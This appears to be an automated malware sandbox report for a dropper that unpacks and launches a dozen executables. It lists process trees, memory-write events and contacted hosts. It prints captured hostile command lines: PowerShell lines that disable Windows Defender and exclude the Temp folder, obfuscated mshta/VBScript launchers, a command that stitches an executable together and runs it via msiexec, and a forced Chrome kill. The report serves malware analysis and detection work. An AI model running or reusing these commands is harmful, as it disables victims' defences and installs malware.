N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4252 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4252 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4252 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1712 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe
PID 1712 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe
PID 1712 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe
PID 1656 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1044 wrote to memory of 4884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 4884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 4884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 3640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 3640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 3640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1656 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4876 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe
PID 4876 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe
PID 4876 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe
PID 1772 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe

Processes

C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe

"C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu126011caea28.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe

Thu12ca1c119bc29.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe

Thu122f7469b214cb59.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe

Thu1262fd911d3e6320.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe

Thu1231d30cda84872.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe

Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe

Thu124078ed79bdbd5.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe

Thu123e05ebe43921.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12b275ee70c7e913.exe

Thu12b275ee70c7e913.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe

Thu12493eba7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe

Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe

Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu120bfbc2443b3b5d.exe

Thu120bfbc2443b3b5d.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1656 -ip 1656

C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp" /SL5="$50114,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe

Thu12465fe68f85b6156.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 612

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp" /SL5="$7027C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe" ) do taskkill -f -Im "%~nXQ"

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe

yDhNY.exe /pFKkSWJQc5v2ppVFMo

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2276 -ip 2276

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -Im "Thu12493eba7a.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 360

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" ) do taskkill -f -Im "%~nXQ"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe (CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 " , 0 ,trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -Y .\ISA502G.S7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc46a3cc40,0x7ffc46a3cc4c,0x7ffc46a3cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2604 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4588 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4128 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5004,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 c.pki.goog udp
US 172.67.74.161:443 iplogger.org tcp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
N/A 127.0.0.1:63311 tcp
N/A 127.0.0.1:63313 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 gcl-gb.biz udp
